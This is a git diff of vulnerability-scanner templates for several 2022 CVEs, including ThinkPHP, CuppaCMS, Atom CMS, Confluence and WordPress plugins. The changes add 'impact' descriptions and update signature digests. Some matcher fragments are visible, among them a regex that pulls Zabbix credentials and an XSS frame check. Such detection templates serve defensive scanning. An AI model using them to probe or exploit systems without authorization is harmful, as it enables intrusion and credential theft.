+# digest: 4a0a00473045022100c7d801019419bfb7b18313f53b19f76243aa093a3ec62c6f14b2cad707b07fc2022003808a813963303fa9ccc041173910dc7ebe9fb70ed048307cb1dffd5a8e3387:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml
index 0639a9048c..7476985b26 100644
--- a/http/cves/2022/CVE-2022-25481.yaml
+++ b/http/cves/2022/CVE-2022-25481.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information.
   remediation: |
     Upgrade to a patched version of ThinkPHP or apply the necessary security patches.
   reference:
@@ -48,4 +50,4 @@ http:
           - 500
           - 404
         condition: or
-# digest: 4a0a004730450220647d3c9de29b554cd12fd7df92b7e8726954af8ba71c06808d215b12d62bb8a902210083379101baa1ca97e4ef44695ab78970f853e53a1ac3ac404e4860c85d39773a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c7dd738ecbf645cf40b14a0599f9f6b2fe0444883ef7132ad2a46f925b8109db02210095ab38dadea1a5fcd311e80938e3f4c0c280a5a374a1304fe8154cf13723f08e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-25485.yaml b/http/cves/2022/CVE-2022-25485.yaml
index 979a472b3b..8a369f2017 100644
--- a/http/cves/2022/CVE-2022-25485.yaml
+++ b/http/cves/2022/CVE-2022-25485.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
   remediation: |
     Upgrade to the latest version of Cuppa CMS or apply the vendor-provided patch to fix the LFI vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100dc614689325152ac5e989d3d5620ca74ad2629c893fdf3ad7e75d6e98b96b7ef022100e2676c5930d75c44042c8d7478451effd304bb7b04f714e6363ef1e5910041c4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201041456624e7e0c2e4c4c69260b5bf3692db2d9d26d1fbc524da950ed0306679022100f1f31efece4eea855c441299d0558cc6de53ecd878e07d13ca0a2e0b7e6a7852:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-25486.yaml b/http/cves/2022/CVE-2022-25486.yaml
index b873c7629c..8451d21f44 100644
--- a/http/cves/2022/CVE-2022-25486.yaml
+++ b/http/cves/2022/CVE-2022-25486.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
   remediation: |
     Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e4949f5f570c1cc74f438ad76cc6fd6faaa11fa9ae6d9cc2471e5e095d7d7084022100efb0f1e47ed6e3bcb294669cadb787e615c6713841b786ba60a63fa63d863c78:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ac21afc91916b914ee86a22489e090f7bf00b6ba038549dc8111c3b8341d3f33022100d4bb507195f10af4a5340bcad567846817652efa445ff1348a7b40ebf4209220:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml
index 0baf8bb233..ee9ae17a03 100644
--- a/http/cves/2022/CVE-2022-25487.yaml
+++ b/http/cves/2022/CVE-2022-25487.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: Fixed in version Atom CMS v2.1
   reference:
     - https://packetstormsecurity.com/files/166532/Atom-CMS-1.0.2-Shell-Upload.html
@@ -71,4 +73,4 @@ http:
         regex:
           - SET avatar = '(.*?)'
         internal: true
-# digest: 4b0a00483046022100ec3b83058fe6c55f962cb9b9db2c42c9d2f8b434d27b9d7db2f509aeec0c15d8022100f8e2f21d4e8b28c0554b324e9206a15c6603cf2b959d7106b12f7b9f100e4525:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203a4b77bedf635a58bf4cbf02f02188d9f4927fa06dacd87995ea3dfbe9466dac022100d39e2dda717d457d7d4c9601a09fcb51fa2669b07d5a3ec46e02c9da6d89130e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-25488.yaml b/http/cves/2022/CVE-2022-25488.yaml
index 89cf155306..628ff62381 100644
--- a/http/cves/2022/CVE-2022-25488.yaml
+++ b/http/cves/2022/CVE-2022-25488.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: Fixed in version Atom CMS v2.1
   reference:
     - https://github.com/thedigicraft/Atom.CMS/issues/257
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402206d69dd1699f4dce4196f377a001af3890d60dd14f4db4f498148328d0c31ae690220126c72219b29875562909a622b9010d0f639ce970b4b214d661f73146351fc87:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100efb372b7e6ca5668cc576f426f5d58a835232a8f1f770e33c2e60d6afeff6c12022100b10962d88589648c0725a179856ad0a7b3690803b5d5fa3bcf459d759d6500b0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-25489.yaml b/http/cves/2022/CVE-2022-25489.yaml
index 263da6fd00..fed20b0228 100644
--- a/http/cves/2022/CVE-2022-25489.yaml
+++ b/http/cves/2022/CVE-2022-25489.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the "A" parameter in /widgets/debug.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: Fixed in version Atom CMS v2.1
   reference:
     - https://github.com/thedigicraft/Atom.CMS/issues/258
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a52b2b0ec92d972c2eadd5e142c5312b89f81e38357f7931c9dfd18fea639c1f02201d5295966d9dd638d522f3046151bbbf384104cf9e4a13a1421dd75d6504a110:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e232dda182a28271c61b6c9b212a374cb306b180cf609ea853f72d27f67feaf702205ccc237d477fa2c4b1cfe57680214310ee75318974aab4c2aed1251f466d4396:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-25497.yaml b/http/cves/2022/CVE-2022-25497.yaml
index 9404ccc777..1a7e7db5b3 100644
--- a/http/cves/2022/CVE-2022-25497.yaml
+++ b/http/cves/2022/CVE-2022-25497.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
   remediation: |
     Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100976968742f24ed3791847c811af319bbcbb919e3ab1e5b09999f6e8186657feb022100f7caa7b63e4cc796eb4da93606f597f2c20ed0ce8ced3fe34d2891a590793dbf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220519b5ed2a1150f8323c3144023fd4d78316691156c782de1014701aa01cc2d490221008c867a99e7e9ae66d4f84b183f984487e9e3794b7a80714141e926e492ab1647:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml
index 7089632f66..777c89b5da 100644
--- a/http/cves/2022/CVE-2022-2551.yaml
+++ b/http/cves/2022/CVE-2022-2551.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized actions on the affected WordPress site.
   remediation: Fixed in version 1.4.7.1.
   reference:
     - https://wpscan.com/vulnerability/f27d753e-861a-4d8d-9b9a-6c99a8a7ebe0
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402200590a61209440477509abef4472e630ebd0c929a26fd92798d1c9b87e5dbd54e022067d0570eaaa9078644873f8e49a30d0ab78914a178925edbc3a173289014791a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206484dcd40735416f1cf2c1180a24f07a7cdad7d10448dc54d49ab4ad4d2a2586022100b16a4694a9d80ce294fc999ab1289bb48e323ab027a55084ab00b74430e0811f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml
index 0de8c88f91..3bf7045c63 100644
--- a/http/cves/2022/CVE-2022-2599.yaml
+++ b/http/cves/2022/CVE-2022-2599.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Anti-Malware Security and Brute-Force Firewall plugin before 4.21.83 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in an admin dashboard.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the targeted WordPress site, potentially leading to unauthorized access, data theft, or further attacks.
   remediation: |
     Update the WordPress Anti-Malware Security and Brute-Force Firewall plugin to version 4.21.83 or later to mitigate the vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e633a189ae386520ef8dfa52011a9650ccfe18067a6decc9cb652613d3d9220202204b04c6e60142dc8dc47894d2efc78c6390a682ff95550006158515271d789ae8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202644d891b3fe29d3cb3f274d195f578651fd45aa8625583c4d8168cfe20b49ef02202b60897c23831bbf28fe7755a171404d6c9ce0550174b3ff279598100763641b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml
index 4eea1ff98e..f19ab18dd4 100644
--- a/http/cves/2022/CVE-2022-26134.yaml
+++ b/http/cves/2022/CVE-2022-26134.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
         kval:
           - "x_cmd_response"
         part: header
-# digest: 4a0a00473045022100c85dffcaef728cd39b828f0c9d08ac611f86249aff139c9c8841da70655004ed022054470670dc7862852687328b6fa65e435c480da87d1beb740d9a35c9886fada7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cf7a9232cc07d953253d93b8e493bdf9be92e04d0af6b258ca686a2f238a0afd022050199ebeef1b4873a01cd660297c85727c6ecabfebe920daf1dbed0d88650580:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml
index f18dad5677..ca6ac3eaee 100644
--- a/http/cves/2022/CVE-2022-26138.yaml
+++ b/http/cves/2022/CVE-2022-26138.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Confluence instance.
   remediation: |
     Update the Atlassian Questions For Confluence plugin to the latest version, which removes the hardcoded credentials.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: dsl
         dsl:
           - 'location == "/httpvoid.action"'
-# digest: 4a0a0047304502204cbf9227cfa482753d83313ea860733511f60c97b377882053d91147766ac9a1022100ef2e661998e5b709bd61eb0c29cc38da7e47b7d81a4689978b5074323550a0ca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f2f56a86ffafdc5bbeee9e615b7bb76b42885286d03af5955cdc1e2dfa0a2f5902204af2261f59b8750dea3a36ec060c32799f0d30f8f1e7e386aacbd24ddd82800e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml
index c1a9c50388..45e687b710 100644
--- a/http/cves/2022/CVE-2022-26148.yaml
+++ b/http/cves/2022/CVE-2022-26148.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.
+  impact: |
+    An attacker can obtain sensitive credentials, leading to unauthorized access and potential data breaches.
   remediation: |
     Update to the latest version of the Grafana & Zabbix Integration plugin to fix the vulnerability.
   reference:
@@ -61,4 +63,4 @@ http:
           - '"password":"(.*?)"'
           - '"username":"(.*?)"'
           - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php'
-# digest: 490a0046304402205cbff39f9b62033786d66e83228b6ee2b10286b6b9092ab3f546974d1efd349002203fbeb3066931871ac514a9a5bcd106f32e8785500fff9cb910696de9aa7454ca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bfcc7b62ca4021b1f5a054f262a2d28feb8a782837d0680726ae4c697d5d6328022100809689aef303fae21d043c9e53003d7d58394425d8237c0d8597b4a20edecf15:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-26159.yaml b/http/cves/2022/CVE-2022-26159.yaml
index 9afcb274df..1ad517ffdf 100644
--- a/http/cves/2022/CVE-2022-26159.yaml
+++ b/http/cves/2022/CVE-2022-26159.yaml
@@ -5,6 +5,8 @@ info:
   author: Remi Gascou (podalirius)
   severity: medium
   description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.
+  impact: |
+    The vulnerability can lead to the exposure of sensitive data, such as user credentials or system configuration.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Ametys CMS.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c89f98017dda0a099a2c235b8604beee28116aa1b9700d345e93b6bbf94a4d28022011d076470a9e77061343539d00d061f8e3c9d77d8948ae70b369ceea30ddc8d5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220091b78537917167cf362bbb85ab4a6c785377d2bec69ca14be7105084440e762022100fb640410e40c467ba88b7161d040e717a8b6017d05ef49fb1acabefba726c724:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-26233.yaml b/http/cves/2022/CVE-2022-26233.yaml
index 2f62bd5b79..3d36ae9caf 100644
--- a/http/cves/2022/CVE-2022-26233.yaml
+++ b/http/cves/2022/CVE-2022-26233.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
           - "fonts"
           - "extensions"
         condition: and
-# digest: 490a0046304402203ea58b1d6230e3628489ca48356e81ea02f347e05d37dbc3368eba83c0959ed702202da7218f9fab2fb94521f8446b201962ed825b16473d97ca8886e63ef7b1f9a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b9877c8906163fa3c4a980ce0a0def0f98f641f7876b3ed15a9e9bbd93110df502210080e01d8aaf1b6534ab9ae2c0876a200fbe97f201a9d1a906d850044d0a77b34e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml
index c2cf9fe302..32efcbb371 100644
--- a/http/cves/2022/CVE-2022-26263.yaml
+++ b/http/cves/2022/CVE-2022-26263.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Yonyou U8 13.0 application.
   reference:
@@ -40,4 +42,4 @@ headless:
           - '<frame src="javascript:console.log(document.domain)"'
           - 'webhelp4.js'
         condition: and
-# digest: 490a00463044022073c4b47361d9e0de479a79332a86c1e3c70bb9f83a35884f0a09f836b328008d022040b568278fbfeac9babae6393c750ca096d2543b9d32911692180af9e1578a82:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220657c515ce7c779a77841dd59d9dfe68afe80d77dc25414a7f301bf7f58a9aa95022100fb1791d4f674b5a9d60b44b02e3fef9df370d821617eefec7d98af60cf04a2b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml
index 0eba6283e8..cb38558125 100644
--- a/http/cves/2022/CVE-2022-2627.yaml
+++ b/http/cves/2022/CVE-2022-2627.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: Fixed in version 12
   reference:
     - https://wpscan.com/vulnerability/038327d0-568f-4011-9b7e-3da39e8b6aea
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220354c52150709dae7e04f3736057c70f37f9770d33c40a18d59dd5106df84b3c8022100b43887764d351fd1fb7c3a01d218fcab113c70d4075f3da38baa4f44480f7709:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206374b4e74a527e41e99f71fe22a0d3fe07b5d30aab86a1b8709cf910ba4b7632022014793104d6d9d6b0f9271c574b97f48c956e6d220a7aedb7c80e27db6b31b9ce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2633.yaml b/http/cves/2022/CVE-2022-2633.yaml
index 81d6268a4a..cd8c24f565 100644
--- a/http/cves/2022/CVE-2022-2633.yaml
+++ b/http/cves/2022/CVE-2022-2633.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the 'dl' parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server.
+  impact: |
+    An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access, data leakage, or further attacks.
   remediation: |
     Update to the latest version of the All-In-One Video Gallery plugin (2.6.0) or apply the vendor-provided patch to fix the SSRF vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203fa5391e2493c8745fd721d1c6fd25054479811f154c4a765b2f309005214274022100edd720594956f3e4d3944dd1f1215806770eed6c54e9fb422e0dc0c4301452c8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210082692b7866e5b5ee7ee65cbcc12a33cc96bf670b8222fd1d2782c9902ded1e5b02207a9382f8fde9239bcff850b6fd3c3099d684157ec91e9d6db1d40e6eb631a18f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml
index d1f92e852e..7fb74091a7 100644
--- a/http/cves/2022/CVE-2022-26352.yaml
+++ b/http/cves/2022/CVE-2022-26352.yaml
@@ -5,6 +5,8 @@ info:
   author: h1ei1
   severity: critical
   description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions.
+  impact: |
+    Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
           - 'contains(body_2, "CVE-2022-26352")'
           - 'status_code_2 == 200'
         condition: and
-# digest: 4b0a00483046022100b52caf94827a4a7502ef392b68e77be9e7bf073a477095be5aa751bd24205db9022100fe4f875ba7d393886060e49c4ef7e00416cce03c25864fc37770599015cd89c1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022078f3d112644b4ea591b5919bb1a664a48dc91d209beb2fbb3f5eb009d6b6eb24022043e100509e39404e8777c3a93594f4dee9b932068eab4187bf922b205d59e2ff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml
index 66e35e8e3e..194a8eb939 100644
--- a/http/cves/2022/CVE-2022-26564.yaml
+++ b/http/cves/2022/CVE-2022-26564.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220167b835120bb925ef6a60c54fb494f287ca26879c5c894a47b245ca52590453e02201bd55fa312aa599e0483739c63c9faca342217191fa8bd66ec63716b7fd94a01:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c0264e0e9315ffabbe9188f7dbd61622ae6537023f52fdfc834897fc04e0efdc02210098edb64e5d39bdcb30bff7181fb57acac5338f057d7e6283eb2430b1698ee748:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml
index 342add4a2c..eb578d738d 100644
--- a/http/cves/2022/CVE-2022-26833.yaml
+++ b/http/cves/2022/CVE-2022-26833.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     An improper authentication vulnerability exists in the REST API functionality of Open Automation Software OAS Platform V16.00.0121. A specially-crafted series of HTTP requests can lead to unauthenticated use of the REST API. An attacker can send a series of HTTP requests to trigger this vulnerability.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to the affected system.
   remediation: |
     Apply the latest security patch or update to the Open Automation Software OAS Platform V16.00.0121 to fix the missing authentication issue.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ee007dc9c1693fb70970cd901db3c181e6bf4d46d574f8090ec5cb5a69fcdaea02203be854a622a390e3ddd8883b9f0847272eb4c23301a32ccd68cc9844ae626b22:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205a0cbec09f39942edf8e8363958e1734bd17edc7f73c0da5e1213339d9b23d6e022067e5d5e72d9d8cfd70e8b06d6162e74d5dcc52d5d94568080f2e78a5eb9da432:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml
index f64519abad..a261d5f1cf 100644
--- a/http/cves/2022/CVE-2022-26960.yaml
+++ b/http/cves/2022/CVE-2022-26960.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
   remediation: |
     Upgrade elFinder to version 2.1.61 or later to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a9124cc873d316ac296c7dafebf40368e460def6b9a865cc42dc5cff2e69b6790220551d56036c8320fae3af943b68d2eba075c69c69a26b4cf6b4cd6e0324e2a6b7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203a9ba665e03377f8db89aea28ba7103d7ea4a2f7e664afc91b730ae7d38f907f02207b52cb749f81a4dfafb4a8a975e8ee1bb9fc2cb689833d88314570c1a13a04e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml
index d4a0f98a0b..06c8ab9bcd 100644
--- a/http/cves/2022/CVE-2022-2733.yaml
+++ b/http/cves/2022/CVE-2022-2733.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade Openemr to version 7.0.0.1 or later to mitigate this vulnerability.
   reference:
@@ -59,4 +61,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008af162127dc492285d790ed5acd1e1f496cfe6f472934ab443a9dac4f57e5388022100bcd26b4e9220e4c6ff76c64ecec2a03e6102fb89f860612d715cacaf1e263c6d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ca7ffdebc0dbc78d5a8a2e5aae6cc4c6f979a6a46273cf6060c7c1b235a6579602202a81ef12d4ad43dc3645438b72e5e4771fb4557004fd1b887e15485ee46e2fdb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml
index de6e79516d..c0fe0988af 100644
--- a/http/cves/2022/CVE-2022-2756.yaml
+++ b/http/cves/2022/CVE-2022-2756.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Kavita before 0.5.4.1 is susceptible to server-side request forgery in GitHub repository kareadita/kavita. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further attacks.
   remediation: Fixed in 0.5.4.1.
   reference:
     - https://huntr.dev/bounties/95e7c181-9d80-4428-aebf-687ac55a9216/
@@ -80,4 +82,4 @@ http:
         regex:
           - coverupload.(.*?).png
         internal: true
-# digest: 4a0a0047304502210097473a127dd5906051eae69272c1175e7467a271e948d8a171df089d897c65180220472f2222872e71c4901a864167da815b9ae225a4f93d0517a90801afd3dadc53:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
